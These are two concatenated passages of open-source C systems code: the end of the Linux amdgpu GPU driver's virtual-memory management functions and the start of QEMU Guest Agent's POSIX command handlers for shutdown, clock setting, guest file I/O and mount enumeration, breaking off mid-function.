!!(adev->vm_manager.vm_update_mode & AMDGPU_VM_USE_CPU_FOR_COMPUTE); if (adev->asic_type == CHIP_RAVEN) vm->pte_support_ats = true; } else { vm->use_cpu_for_update = !!(adev->vm_manager.vm_update_mode & AMDGPU_VM_USE_CPU_FOR_GFX); } DRM_DEBUG_DRIVER("VM update mode is %s\n", vm->use_cpu_for_update ? "CPU" : "SDMA"); WARN_ONCE((vm->use_cpu_for_update & !amdgpu_vm_is_large_bar(adev)), "CPU update of VM recommended only for large BAR system\n"); vm->last_update = NULL; flags = AMDGPU_GEM_CREATE_VRAM_CONTIGUOUS; if (vm->use_cpu_for_update) flags |= AMDGPU_GEM_CREATE_CPU_ACCESS_REQUIRED; else flags |= AMDGPU_GEM_CREATE_SHADOW; size = amdgpu_vm_bo_size(adev, adev->vm_manager.root_level); r = amdgpu_bo_create(adev, size, align, AMDGPU_GEM_DOMAIN_VRAM, flags, ttm_bo_type_kernel, NULL, &vm->root.base.bo); if (r) goto error_free_sched_entity; r = amdgpu_bo_reserve(vm->root.base.bo, true); if (r) goto error_free_root; r = amdgpu_vm_clear_bo(adev, vm, vm->root.base.bo, adev->vm_manager.root_level, vm->pte_support_ats); if (r) goto error_unreserve; vm->root.base.vm = vm; list_add_tail(&vm->root.base.bo_list, &vm->root.base.bo->va); list_add_tail(&vm->root.base.vm_status, &vm->evicted); amdgpu_bo_unreserve(vm->root.base.bo); if (pasid) { unsigned long flags; spin_lock_irqsave(&adev->vm_manager.pasid_lock, flags); r = idr_alloc(&adev->vm_manager.pasid_idr, vm, pasid, pasid + 1, GFP_ATOMIC); spin_unlock_irqrestore(&adev->vm_manager.pasid_lock, flags); if (r < 0) goto error_free_root; vm->pasid = pasid; } INIT_KFIFO(vm->faults); vm->fault_credit = 16; return 0; error_unreserve: amdgpu_bo_unreserve(vm->root.base.bo); error_free_root: amdgpu_bo_unref(&vm->root.base.bo->shadow); amdgpu_bo_unref(&vm->root.base.bo); vm->root.base.bo = NULL; error_free_sched_entity: drm_sched_entity_fini(&ring->sched, &vm->entity); return r; } /** * amdgpu_vm_make_compute - Turn a GFX VM into a compute VM * * This only works on GFX VMs that don't have any BOs added and no * page tables allocated yet. * * Changes the following VM parameters: * - use_cpu_for_update * - pte_supports_ats * - pasid (old PASID is released, because compute manages its own PASIDs) * * Reinitializes the page directory to reflect the changed ATS * setting. May leave behind an unused shadow BO for the page * directory when switching from SDMA updates to CPU updates. * * Returns 0 for success, -errno for errors. */ int amdgpu_vm_make_compute(struct amdgpu_device *adev, struct amdgpu_vm *vm) { bool pte_support_ats = (adev->asic_type == CHIP_RAVEN); int r; r = amdgpu_bo_reserve(vm->root.base.bo, true); if (r) return r; /* Sanity checks */ if (!RB_EMPTY_ROOT(&vm->va.rb_root) || vm->root.entries) { r = -EINVAL; goto error; } /* Check if PD needs to be reinitialized and do it before * changing any other state, in case it fails. */ if (pte_support_ats != vm->pte_support_ats) { r = amdgpu_vm_clear_bo(adev, vm, vm->root.base.bo, adev->vm_manager.root_level, pte_support_ats); if (r) goto error; } /* Update VM state */ vm->use_cpu_for_update = !!(adev->vm_manager.vm_update_mode & AMDGPU_VM_USE_CPU_FOR_COMPUTE); vm->pte_support_ats = pte_support_ats; DRM_DEBUG_DRIVER("VM update mode is %s\n", vm->use_cpu_for_update ? "CPU" : "SDMA"); WARN_ONCE((vm->use_cpu_for_update & !amdgpu_vm_is_large_bar(adev)), "CPU update of VM recommended only for large BAR system\n"); if (vm->pasid) { unsigned long flags; spin_lock_irqsave(&adev->vm_manager.pasid_lock, flags); idr_remove(&adev->vm_manager.pasid_idr, vm->pasid); spin_unlock_irqrestore(&adev->vm_manager.pasid_lock, flags); vm->pasid = 0; } error: amdgpu_bo_unreserve(vm->root.base.bo); return r; } /** * amdgpu_vm_free_levels - free PD/PT levels * * @adev: amdgpu device structure * @parent: PD/PT starting level to free * @level: level of parent structure * * Free the page directory or page table level and all sub levels. */ static void amdgpu_vm_free_levels(struct amdgpu_device *adev, struct amdgpu_vm_pt *parent, unsigned level) { unsigned i, num_entries = amdgpu_vm_num_entries(adev, level); if (parent->base.bo) { list_del(&parent->base.bo_list); list_del(&parent->base.vm_status); amdgpu_bo_unref(&parent->base.bo->shadow); amdgpu_bo_unref(&parent->base.bo); } if (parent->entries) for (i = 0; i < num_entries; i++) amdgpu_vm_free_levels(adev, &parent->entries[i], level + 1); kvfree(parent->entries); } /** * amdgpu_vm_fini - tear down a vm instance * * @adev: amdgpu_device pointer * @vm: requested vm * * Tear down @vm. * Unbind the VM and remove all bos from the vm bo list */ void amdgpu_vm_fini(struct amdgpu_device *adev, struct amdgpu_vm *vm) { struct amdgpu_bo_va_mapping *mapping, *tmp; bool prt_fini_needed = !!adev->gmc.gmc_funcs->set_prt; struct amdgpu_bo *root; u64 fault; int i, r; amdgpu_amdkfd_gpuvm_destroy_cb(adev, vm); /* Clear pending page faults from IH when the VM is destroyed */ while (kfifo_get(&vm->faults, &fault)) amdgpu_ih_clear_fault(adev, fault); if (vm->pasid) { unsigned long flags; spin_lock_irqsave(&adev->vm_manager.pasid_lock, flags); idr_remove(&adev->vm_manager.pasid_idr, vm->pasid); spin_unlock_irqrestore(&adev->vm_manager.pasid_lock, flags); } drm_sched_entity_fini(vm->entity.sched, &vm->entity); if (!RB_EMPTY_ROOT(&vm->va.rb_root)) { dev_err(adev->dev, "still active bo inside vm\n"); } rbtree_postorder_for_each_entry_safe(mapping, tmp, &vm->va.rb_root, rb) { list_del(&mapping->list); amdgpu_vm_it_remove(mapping, &vm->va); kfree(mapping); } list_for_each_entry_safe(mapping, tmp, &vm->freed, list) { if (mapping->flags & AMDGPU_PTE_PRT && prt_fini_needed) { amdgpu_vm_prt_fini(adev, vm); prt_fini_needed = false; } list_del(&mapping->list); amdgpu_vm_free_mapping(adev, vm, mapping, NULL); } root = amdgpu_bo_ref(vm->root.base.bo); r = amdgpu_bo_reserve(root, true); if (r) { dev_err(adev->dev, "Leaking page tables because BO reservation failed\n"); } else { amdgpu_vm_free_levels(adev, &vm->root, adev->vm_manager.root_level); amdgpu_bo_unreserve(root); } amdgpu_bo_unref(&root); dma_fence_put(vm->last_update); for (i = 0; i < AMDGPU_MAX_VMHUBS; i++) amdgpu_vmid_free_reserved(adev, vm, i); } /** * amdgpu_vm_pasid_fault_credit - Check fault credit for given PASID * * @adev: amdgpu_device pointer * @pasid: PASID do identify the VM * * This function is expected to be called in interrupt context. Returns * true if there was fault credit, false otherwise */ bool amdgpu_vm_pasid_fault_credit(struct amdgpu_device *adev, unsigned int pasid) { struct amdgpu_vm *vm; spin_lock(&adev->vm_manager.pasid_lock); vm = idr_find(&adev->vm_manager.pasid_idr, pasid); if (!vm) { /* VM not found, can't track fault credit */ spin_unlock(&adev->vm_manager.pasid_lock); return true; } /* No lock needed. only accessed by IRQ handler */ if (!vm->fault_credit) { /* Too many faults in this VM */ spin_unlock(&adev->vm_manager.pasid_lock); return false; } vm->fault_credit--; spin_unlock(&adev->vm_manager.pasid_lock); return true; } /** * amdgpu_vm_manager_init - init the VM manager * * @adev: amdgpu_device pointer * * Initialize the VM manager structures */ void amdgpu_vm_manager_init(struct amdgpu_device *adev) { unsigned i; amdgpu_vmid_mgr_init(adev); adev->vm_manager.fence_context = dma_fence_context_alloc(AMDGPU_MAX_RINGS); for (i = 0; i < AMDGPU_MAX_RINGS; ++i) adev->vm_manager.seqno[i] = 0; atomic_set(&adev->vm_manager.vm_pte_next_ring, 0); spin_lock_init(&adev->vm_manager.prt_lock); atomic_set(&adev->vm_manager.num_prt_users, 0); /* If not overridden by the user, by default, only in large BAR systems * Compute VM tables will be updated by CPU */ #ifdef CONFIG_X86_64 if (amdgpu_vm_update_mode == -1) { if (amdgpu_vm_is_large_bar(adev)) adev->vm_manager.vm_update_mode = AMDGPU_VM_USE_CPU_FOR_COMPUTE; else adev->vm_manager.vm_update_mode = 0; } else adev->vm_manager.vm_update_mode = amdgpu_vm_update_mode; #else adev->vm_manager.vm_update_mode = 0; #endif idr_init(&adev->vm_manager.pasid_idr); spin_lock_init(&adev->vm_manager.pasid_lock); } /** * amdgpu_vm_manager_fini - cleanup VM manager * * @adev: amdgpu_device pointer * * Cleanup the VM manager and free resources. */ void amdgpu_vm_manager_fini(struct amdgpu_device *adev) { WARN_ON(!idr_is_empty(&adev->vm_manager.pasid_idr)); idr_destroy(&adev->vm_manager.pasid_idr); amdgpu_vmid_mgr_fini(adev); } int amdgpu_vm_ioctl(struct drm_device *dev, void *data, struct drm_file *filp) { union drm_amdgpu_vm *args = data; struct amdgpu_device *adev = dev->dev_private; struct amdgpu_fpriv *fpriv = filp->driver_priv; int r; switch (args->in.op) { case AMDGPU_VM_OP_RESERVE_VMID: /* current, we only have requirement to reserve vmid from gfxhub */ r = amdgpu_vmid_alloc_reserved(adev, &fpriv->vm, AMDGPU_GFXHUB); if (r) return r; break; case AMDGPU_VM_OP_UNRESERVE_VMID: amdgpu_vmid_free_reserved(adev, &fpriv->vm, AMDGPU_GFXHUB); break; default: return -EINVAL; } return 0; }
967243.c
/* * QEMU Guest Agent POSIX-specific command implementations * * Copyright IBM Corp. 2011 * * Authors: * Michael Roth <mdroth@linux.vnet.ibm.com> * Michal Privoznik <mprivozn@redhat.com> * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ #include "qemu/osdep.h" #include <sys/ioctl.h> #include <sys/utsname.h> #include <sys/wait.h> #include <dirent.h> #include "guest-agent-core.h" #include "qga-qapi-commands.h" #include "qapi/error.h" #include "qapi/qmp/qerror.h" #include "qemu/queue.h" #include "qemu/host-utils.h" #include "qemu/sockets.h" #include "qemu/base64.h" #include "qemu/cutils.h" #ifdef HAVE_UTMPX #include <utmpx.h> #endif #ifndef CONFIG_HAS_ENVIRON #ifdef __APPLE__ #include <crt_externs.h> #define environ (*_NSGetEnviron()) #else extern char **environ; #endif #endif #if defined(__linux__) #include <mntent.h> #include <linux/fs.h> #include <ifaddrs.h> #include <arpa/inet.h> #include <sys/socket.h> #include <net/if.h> #include <sys/statvfs.h> #ifdef CONFIG_LIBUDEV #include <libudev.h> #endif #ifdef FIFREEZE #define CONFIG_FSFREEZE #endif #ifdef FITRIM #define CONFIG_FSTRIM #endif #endif static void ga_wait_child(pid_t pid, int *status, Error **errp) { pid_t rpid; *status = 0; do { rpid = waitpid(pid, status, 0); } while (rpid == -1 && errno == EINTR); if (rpid == -1) { error_setg_errno(errp, errno, "failed to wait for child (pid: %d)", pid); return; } g_assert(rpid == pid); } void qmp_guest_shutdown(bool has_mode, const char *mode, Error **errp) { const char *shutdown_flag; Error *local_err = NULL; pid_t pid; int status; slog("guest-shutdown called, mode: %s", mode); if (!has_mode || strcmp(mode, "powerdown") == 0) { shutdown_flag = "-P"; } else if (strcmp(mode, "halt") == 0) { shutdown_flag = "-H"; } else if (strcmp(mode, "reboot") == 0) { shutdown_flag = "-r"; } else { error_setg(errp, "mode is invalid (valid values are: halt|powerdown|reboot"); return; } pid = fork(); if (pid == 0) { /* child, start the shutdown */ setsid(); reopen_fd_to_null(0); reopen_fd_to_null(1); reopen_fd_to_null(2); execle("/sbin/shutdown", "shutdown", "-h", shutdown_flag, "+0", "hypervisor initiated shutdown", (char*)NULL, environ); _exit(EXIT_FAILURE); } else if (pid < 0) { error_setg_errno(errp, errno, "failed to create child process"); return; } ga_wait_child(pid, &status, &local_err); if (local_err) { error_propagate(errp, local_err); return; } if (!WIFEXITED(status)) { error_setg(errp, "child process has terminated abnormally"); return; } if (WEXITSTATUS(status)) { error_setg(errp, "child process has failed to shutdown"); return; } /* succeeded */ } int64_t qmp_guest_get_time(Error **errp) { int ret; qemu_timeval tq; ret = qemu_gettimeofday(&tq); if (ret < 0) { error_setg_errno(errp, errno, "Failed to get time"); return -1; } return tq.tv_sec * 1000000000LL + tq.tv_usec * 1000; } void qmp_guest_set_time(bool has_time, int64_t time_ns, Error **errp) { int ret; int status; pid_t pid; Error *local_err = NULL; struct timeval tv; /* If user has passed a time, validate and set it. */ if (has_time) { GDate date = { 0, }; /* year-2038 will overflow in case time_t is 32bit */ if (time_ns / 1000000000 != (time_t)(time_ns / 1000000000)) { error_setg(errp, "Time %" PRId64 " is too large", time_ns); return; } tv.tv_sec = time_ns / 1000000000; tv.tv_usec = (time_ns % 1000000000) / 1000; g_date_set_time_t(&date, tv.tv_sec); if (date.year < 1970 || date.year >= 2070) { error_setg_errno(errp, errno, "Invalid time"); return; } ret = settimeofday(&tv, NULL); if (ret < 0) { error_setg_errno(errp, errno, "Failed to set time to guest"); return; } } /* Now, if user has passed a time to set and the system time is set, we * just need to synchronize the hardware clock. However, if no time was * passed, user is requesting the opposite: set the system time from the * hardware clock (RTC). */ pid = fork(); if (pid == 0) { setsid(); reopen_fd_to_null(0); reopen_fd_to_null(1); reopen_fd_to_null(2); /* Use '/sbin/hwclock -w' to set RTC from the system time, * or '/sbin/hwclock -s' to set the system time from RTC. */ execle("/sbin/hwclock", "hwclock", has_time ? "-w" : "-s", NULL, environ); _exit(EXIT_FAILURE); } else if (pid < 0) { error_setg_errno(errp, errno, "failed to create child process"); return; } ga_wait_child(pid, &status, &local_err); if (local_err) { error_propagate(errp, local_err); return; } if (!WIFEXITED(status)) { error_setg(errp, "child process has terminated abnormally"); return; } if (WEXITSTATUS(status)) { error_setg(errp, "hwclock failed to set hardware clock to system time"); return; } } typedef enum { RW_STATE_NEW, RW_STATE_READING, RW_STATE_WRITING, } RwState; typedef struct GuestFileHandle { uint64_t id; FILE *fh; RwState state; QTAILQ_ENTRY(GuestFileHandle) next; } GuestFileHandle; static struct { QTAILQ_HEAD(, GuestFileHandle) filehandles; } guest_file_state = { .filehandles = QTAILQ_HEAD_INITIALIZER(guest_file_state.filehandles), }; static int64_t guest_file_handle_add(FILE *fh, Error **errp) { GuestFileHandle *gfh; int64_t handle; handle = ga_get_fd_handle(ga_state, errp); if (handle < 0) { return -1; } gfh = g_new0(GuestFileHandle, 1); gfh->id = handle; gfh->fh = fh; QTAILQ_INSERT_TAIL(&guest_file_state.filehandles, gfh, next); return handle; } static GuestFileHandle *guest_file_handle_find(int64_t id, Error **errp) { GuestFileHandle *gfh; QTAILQ_FOREACH(gfh, &guest_file_state.filehandles, next) { if (gfh->id == id) { return gfh; } } error_setg(errp, "handle '%" PRId64 "' has not been found", id); return NULL; } typedef const char * const ccpc; #ifndef O_BINARY #define O_BINARY 0 #endif /* http://pubs.opengroup.org/onlinepubs/9699919799/functions/fopen.html */ static const struct { ccpc *forms; int oflag_base; } guest_file_open_modes[] = { { (ccpc[]){ "r", NULL }, O_RDONLY }, { (ccpc[]){ "rb", NULL }, O_RDONLY | O_BINARY }, { (ccpc[]){ "w", NULL }, O_WRONLY | O_CREAT | O_TRUNC }, { (ccpc[]){ "wb", NULL }, O_WRONLY | O_CREAT | O_TRUNC | O_BINARY }, { (ccpc[]){ "a", NULL }, O_WRONLY | O_CREAT | O_APPEND }, { (ccpc[]){ "ab", NULL }, O_WRONLY | O_CREAT | O_APPEND | O_BINARY }, { (ccpc[]){ "r+", NULL }, O_RDWR }, { (ccpc[]){ "rb+", "r+b", NULL }, O_RDWR | O_BINARY }, { (ccpc[]){ "w+", NULL }, O_RDWR | O_CREAT | O_TRUNC }, { (ccpc[]){ "wb+", "w+b", NULL }, O_RDWR | O_CREAT | O_TRUNC | O_BINARY }, { (ccpc[]){ "a+", NULL }, O_RDWR | O_CREAT | O_APPEND }, { (ccpc[]){ "ab+", "a+b", NULL }, O_RDWR | O_CREAT | O_APPEND | O_BINARY } }; static int find_open_flag(const char *mode_str, Error **errp) { unsigned mode; for (mode = 0; mode < ARRAY_SIZE(guest_file_open_modes); ++mode) { ccpc *form; form = guest_file_open_modes[mode].forms; while (*form != NULL && strcmp(*form, mode_str) != 0) { ++form; } if (*form != NULL) { break; } } if (mode == ARRAY_SIZE(guest_file_open_modes)) { error_setg(errp, "invalid file open mode '%s'", mode_str); return -1; } return guest_file_open_modes[mode].oflag_base | O_NOCTTY | O_NONBLOCK; } #define DEFAULT_NEW_FILE_MODE (S_IRUSR | S_IWUSR | \ S_IRGRP | S_IWGRP | \ S_IROTH | S_IWOTH) static FILE * safe_open_or_create(const char *path, const char *mode, Error **errp) { Error *local_err = NULL; int oflag; oflag = find_open_flag(mode, &local_err); if (local_err == NULL) { int fd; /* If the caller wants / allows creation of a new file, we implement it * with a two step process: open() + (open() / fchmod()). * * First we insist on creating the file exclusively as a new file. If * that succeeds, we're free to set any file-mode bits on it. (The * motivation is that we want to set those file-mode bits independently * of the current umask.) * * If the exclusive creation fails because the file already exists * (EEXIST is not possible for any other reason), we just attempt to * open the file, but in this case we won't be allowed to change the * file-mode bits on the preexistent file. * * The pathname should never disappear between the two open()s in * practice. If it happens, then someone very likely tried to race us. * In this case just go ahead and report the ENOENT from the second * open() to the caller. * * If the caller wants to open a preexistent file, then the first * open() is decisive and its third argument is ignored, and the second * open() and the fchmod() are never called. */ fd = open(path, oflag | ((oflag & O_CREAT) ? O_EXCL : 0), 0); if (fd == -1 && errno == EEXIST) { oflag &= ~(unsigned)O_CREAT; fd = open(path, oflag); } if (fd == -1) { error_setg_errno(&local_err, errno, "failed to open file '%s' " "(mode: '%s')", path, mode); } else { qemu_set_cloexec(fd); if ((oflag & O_CREAT) && fchmod(fd, DEFAULT_NEW_FILE_MODE) == -1) { error_setg_errno(&local_err, errno, "failed to set permission " "0%03o on new file '%s' (mode: '%s')", (unsigned)DEFAULT_NEW_FILE_MODE, path, mode); } else { FILE *f; f = fdopen(fd, mode); if (f == NULL) { error_setg_errno(&local_err, errno, "failed to associate " "stdio stream with file descriptor %d, " "file '%s' (mode: '%s')", fd, path, mode); } else { return f; } } close(fd); if (oflag & O_CREAT) { unlink(path); } } } error_propagate(errp, local_err); return NULL; } int64_t qmp_guest_file_open(const char *path, bool has_mode, const char *mode, Error **errp) { FILE *fh; Error *local_err = NULL; int64_t handle; if (!has_mode) { mode = "r"; } slog("guest-file-open called, filepath: %s, mode: %s", path, mode); fh = safe_open_or_create(path, mode, &local_err); if (local_err != NULL) { error_propagate(errp, local_err); return -1; } /* set fd non-blocking to avoid common use cases (like reading from a * named pipe) from hanging the agent */ qemu_set_nonblock(fileno(fh)); handle = guest_file_handle_add(fh, errp); if (handle < 0) { fclose(fh); return -1; } slog("guest-file-open, handle: %" PRId64, handle); return handle; } void qmp_guest_file_close(int64_t handle, Error **errp) { GuestFileHandle *gfh = guest_file_handle_find(handle, errp); int ret; slog("guest-file-close called, handle: %" PRId64, handle); if (!gfh) { return; } ret = fclose(gfh->fh); if (ret == EOF) { error_setg_errno(errp, errno, "failed to close handle"); return; } QTAILQ_REMOVE(&guest_file_state.filehandles, gfh, next); g_free(gfh); } struct GuestFileRead *qmp_guest_file_read(int64_t handle, bool has_count, int64_t count, Error **errp) { GuestFileHandle *gfh = guest_file_handle_find(handle, errp); GuestFileRead *read_data = NULL; guchar *buf; FILE *fh; size_t read_count; if (!gfh) { return NULL; } if (!has_count) { count = QGA_READ_COUNT_DEFAULT; } else if (count < 0 || count >= UINT32_MAX) { error_setg(errp, "value '%" PRId64 "' is invalid for argument count", count); return NULL; } fh = gfh->fh; /* explicitly flush when switching from writing to reading */ if (gfh->state == RW_STATE_WRITING) { int ret = fflush(fh); if (ret == EOF) { error_setg_errno(errp, errno, "failed to flush file"); return NULL; } gfh->state = RW_STATE_NEW; } buf = g_malloc0(count+1); read_count = fread(buf, 1, count, fh); if (ferror(fh)) { error_setg_errno(errp, errno, "failed to read file"); slog("guest-file-read failed, handle: %" PRId64, handle); } else { buf[read_count] = 0; read_data = g_new0(GuestFileRead, 1); read_data->count = read_count; read_data->eof = feof(fh); if (read_count) { read_data->buf_b64 = g_base64_encode(buf, read_count); } gfh->state = RW_STATE_READING; } g_free(buf); clearerr(fh); return read_data; } GuestFileWrite *qmp_guest_file_write(int64_t handle, const char *buf_b64, bool has_count, int64_t count, Error **errp) { GuestFileWrite *write_data = NULL; guchar *buf; gsize buf_len; int write_count; GuestFileHandle *gfh = guest_file_handle_find(handle, errp); FILE *fh; if (!gfh) { return NULL; } fh = gfh->fh; if (gfh->state == RW_STATE_READING) { int ret = fseek(fh, 0, SEEK_CUR); if (ret == -1) { error_setg_errno(errp, errno, "failed to seek file"); return NULL; } gfh->state = RW_STATE_NEW; } buf = qbase64_decode(buf_b64, -1, &buf_len, errp); if (!buf) { return NULL; } if (!has_count) { count = buf_len; } else if (count < 0 || count > buf_len) { error_setg(errp, "value '%" PRId64 "' is invalid for argument count", count); g_free(buf); return NULL; } write_count = fwrite(buf, 1, count, fh); if (ferror(fh)) { error_setg_errno(errp, errno, "failed to write to file"); slog("guest-file-write failed, handle: %" PRId64, handle); } else { write_data = g_new0(GuestFileWrite, 1); write_data->count = write_count; write_data->eof = feof(fh); gfh->state = RW_STATE_WRITING; } g_free(buf); clearerr(fh); return write_data; } struct GuestFileSeek *qmp_guest_file_seek(int64_t handle, int64_t offset, GuestFileWhence *whence_code, Error **errp) { GuestFileHandle *gfh = guest_file_handle_find(handle, errp); GuestFileSeek *seek_data = NULL; FILE *fh; int ret; int whence; Error *err = NULL; if (!gfh) { return NULL; } /* We stupidly exposed 'whence':'int' in our qapi */ whence = ga_parse_whence(whence_code, &err); if (err) { error_propagate(errp, err); return NULL; } fh = gfh->fh; ret = fseek(fh, offset, whence); if (ret == -1) { error_setg_errno(errp, errno, "failed to seek file"); if (errno == ESPIPE) { /* file is non-seekable, stdio shouldn't be buffering anyways */ gfh->state = RW_STATE_NEW; } } else { seek_data = g_new0(GuestFileSeek, 1); seek_data->position = ftell(fh); seek_data->eof = feof(fh); gfh->state = RW_STATE_NEW; } clearerr(fh); return seek_data; } void qmp_guest_file_flush(int64_t handle, Error **errp) { GuestFileHandle *gfh = guest_file_handle_find(handle, errp); FILE *fh; int ret; if (!gfh) { return; } fh = gfh->fh; ret = fflush(fh); if (ret == EOF) { error_setg_errno(errp, errno, "failed to flush file"); } else { gfh->state = RW_STATE_NEW; } } /* linux-specific implementations. avoid this if at all possible. */ #if defined(__linux__) #if defined(CONFIG_FSFREEZE) || defined(CONFIG_FSTRIM) typedef struct FsMount { char *dirname; char *devtype; unsigned int devmajor, devminor; QTAILQ_ENTRY(FsMount) next; } FsMount; typedef QTAILQ_HEAD(FsMountList, FsMount) FsMountList; static void free_fs_mount_list(FsMountList *mounts) { FsMount *mount, *temp; if (!mounts) { return; } QTAILQ_FOREACH_SAFE(mount, mounts, next, temp) { QTAILQ_REMOVE(mounts, mount, next); g_free(mount->dirname); g_free(mount->devtype); g_free(mount); } } static int dev_major_minor(const char *devpath, unsigned int *devmajor, unsigned int *devminor) { struct stat st; *devmajor = 0; *devminor = 0; if (stat(devpath, &st) < 0) { slog("failed to stat device file '%s': %s", devpath, strerror(errno)); return -1; } if (S_ISDIR(st.st_mode)) { /* It is bind mount */ return -2; } if (S_ISBLK(st.st_mode)) { *devmajor = major(st.st_rdev); *devminor = minor(st.st_rdev); return 0; } return -1; } /* * Walk the mount table and build a list of local file systems */ static void build_fs_mount_list_from_mtab(FsMountList *mounts, Error **errp) { struct mntent *ment; FsMount *mount; char const *mtab = "/proc/self/mounts"; FILE *fp; unsigned int devmajor, devminor; fp = setmntent(mtab, "r"); if (!fp) { error_setg(errp, "failed to open mtab file: '%s'", mtab); return; } while ((ment = getmntent(fp))) { /* * An entry which device name doesn't start with a '/' is * either a dummy file system or a network file system. * Add special handling for smbfs and cifs as is done by * coreutils as well. */ if ((ment->mnt_fsname[0] != '/') || (strcmp(ment->mnt_type, "smbfs") == 0) || (strcmp(ment->mnt_type, "cifs") == 0)) { continue; } if (dev_major_minor(ment->mnt_fsname, &devmajor, &devminor) == -2) { /* Skip bind mounts */ continue; } mount = g_new0(FsMount, 1); mount->dirname = g_strdup(ment->mnt_dir); mount->devtype = g_strdup(ment->mnt_type); mount->devmajor = devmajor; mount->devminor = devminor; QTAILQ_INSERT_TAIL(mounts, mount, next); } endmntent(fp); } static void decode_mntname(char *name, int len) { int i, j = 0; for (i = 0; i <= len; i++) { if (name[i] != '\\') { name[j++] = name[i]; } else if (name[i + 1] == '\\') { name[j++] = '\\'; i++; } else if (name[i + 1] >= '0' && name[i + 1] <= '3' && name[i + 2] >= '0' && name[i + 2] <= '7' && name[i + 3] >= '0' && name[i + 3] <= '7') { name[j++] = (name[i + 1] - '0') * 64 + (name[i + 2] - '0') * 8 + (name[i + 3] - '0'); i += 3; } else { name[j++] = name[i]; } } } static void build_fs_mount_list(FsMountList *mounts, Error **errp) { FsMount *mount; char const *mountinfo = "/proc/self/mountinfo"; FILE *fp; char *line = NULL, *dash; size_t n; char check; unsigned int devmajor, devminor; int ret, dir_s, dir_e, type_s, type_e, dev_s, dev_e; fp = fopen(mountinfo, "r"); if (!fp) { build_fs_mount_list_from_mtab(mounts, errp); return; } while (getline(&line, &n, fp) != -1) { ret = sscanf(line, "%*u %*u %u:%u %*s %n%*s%n%c", &devmajor, &devminor, &dir_s, &dir_e, &check); if (ret < 3) { continue; } dash = strstr(line + dir_e, " - "); if (!dash) { continue; } ret = sscanf(dash, " - %n%*s%n %n%*s%n%c", &type_s, &type_e, &dev_s, &dev_e, &check); if (ret < 1) { continue; } line[dir_e] = 0; dash[type_e] = 0; dash[dev_e] = 0; decode_mntname(line + dir_s, dir_e - dir_s); decode_mntname(dash + dev_s, dev_e - dev_s); if (devmajor == 0) { /* btrfs reports major number = 0 */ if (strcmp("btrfs", dash + type_s) != 0 || dev_major_minor(dash + dev_s, &devmajor, &devminor) < 0) { continue; } } mount = g_new0(FsMount, 1); mount->dirname = g_strdup(line + dir_s); mount->devtype = g_strdup(dash + type_s); mount->devmajor = devmajor; mount->devminor = devminor; QTAILQ_INSERT_TAIL(mounts, mount, next); } free(line); fclose(fp); } #endif #if defined(CONFIG_FSFREEZE) static char *get_pci_driver(char const *syspath, int pathlen, Error **errp) { char *path; char *dpath; char *driver = NULL; char buf[PATH_MAX]; ssize_t len; path = g_strndup(syspath, pathlen); dpath = g_strdup_printf("%s/driver", path); len = readlink(dpath, buf, sizeof(buf) - 1); if (len != -1) { buf[len] = 0; driver = g_path_get_basename(buf); } g_free(dpath); g_free(path); return driver; } static int compare_uint(const void *_a, const void *_b) { unsigned int a = *(unsigned int *)_a; unsigned int b = *(unsigned int *)_b; return a < b ? -1 : a > b ? 1 : 0; } /* Walk the specified sysfs and build a sorted list of host or ata numbers */ static int build_hosts(char const *syspath, char const *host, bool ata, unsigned int *hosts, int hosts_max, Error **errp) { char *path; DIR *dir; struct dirent *entry; int i = 0; path = g_strndup(syspath, host - syspath); dir = opendir(path); if (!dir) { error_setg_errno(errp, errno, "opendir(\"%s\")", path); g_free(path); return -1; } while (i < hosts_max) { entry = readdir(dir); if (!entry) { break; } if (ata && sscanf(entry->d_name, "ata%d", hosts + i) == 1) { ++i; } else if (!ata && sscanf(entry->d_name, "host%d", hosts + i) == 1) { ++i; } } qsort(hosts, i, sizeof(hosts[0]), compare_uint); g_free(path); closedir(dir); return i; } /* Store disk device info specified by @sysfs into @fs */ static void build_guest_fsinfo_for_real_device(char const *syspath, GuestFilesystemInfo *fs, Error **errp) { unsigned int pci[4], host, hosts[8], tgt[3]; int i, nhosts = 0, pcilen; GuestDiskAddress *disk; GuestPCIAddress *pciaddr; GuestDiskAddressList *list = NULL; bool has_ata = false, has_host = false, has_tgt = false; char *p, *q, *driver = NULL; #ifdef CONFIG_LIBUDEV struct udev *udev = NULL; struct udev_device *udevice = NULL; #endif p = strstr(syspath, "/devices/pci"); if (!p || sscanf(p + 12, "%*x:%*x/%x:%x:%x.%x%n", pci, pci + 1, pci + 2, pci + 3, &pcilen) < 4) { g_debug("only pci device is supported: sysfs path '%s'", syspath); return; } p += 12 + pcilen; while (true) { driver = get_pci_driver(syspath, p - syspath, errp); if (driver && (g_str_equal(driver, "ata_piix") || g_str_equal(driver, "sym53c8xx") || g_str_equal(driver, "virtio-pci") || g_str_equal(driver, "ahci"))) { break; } g_free(driver); if (sscanf(p, "/%x:%x:%x.%x%n", pci, pci + 1, pci + 2, pci + 3, &pcilen) == 4) { p += pcilen; continue; } g_debug("unsupported driver or sysfs path '%s'", syspath); return; } p = strstr(syspath, "/target"); if (p && sscanf(p + 7, "%*u:%*u:%*u/%*u:%u:%u:%u", tgt, tgt + 1, tgt + 2) == 3) { has_tgt = true; } p = strstr(syspath, "/ata"); if (p) { q = p + 4; has_ata = true; } else { p = strstr(syspath, "/host"); q = p + 5; } if (p && sscanf(q, "%u", &host) == 1) { has_host = true; nhosts = build_hosts(syspath, p, has_ata, hosts, ARRAY_SIZE(hosts), errp); if (nhosts < 0) { goto cleanup; } } pciaddr = g_malloc0(sizeof(*pciaddr)); pciaddr->domain = pci[0]; pciaddr->bus = pci[1]; pciaddr->slot = pci[2]; pciaddr->function = pci[3]; disk = g_malloc0(sizeof(*disk)); disk->pci_controller = pciaddr; list = g_malloc0(sizeof(*list)); list->value = disk; #ifdef CONFIG_LIBUDEV udev = udev_new(); udevice = udev_device_new_from_syspath(udev, syspath); if (udev == NULL || udevice == NULL) { g_debug("failed to query udev"); } else { const char *devnode, *serial; devnode = udev_device_get_devnode(udevice); if (devnode != NULL) { disk->dev = g_strdup(devnode); disk->has_dev = true; } serial = udev_device_get_property_value(udevice, "ID_SERIAL"); if (serial != NULL && *serial != 0) { disk->serial = g_strdup(serial); disk->has_serial = true; } } #endif if (strcmp(driver, "ata_piix") == 0) { /* a host per ide bus, target*:0:<unit>:0 */ if (!has_host || !has_tgt) { g_debug("invalid sysfs path '%s' (driver '%s')", syspath, driver); goto cleanup; } for (i = 0; i < nhosts; i++) { if (host == hosts[i]) { disk->bus_type = 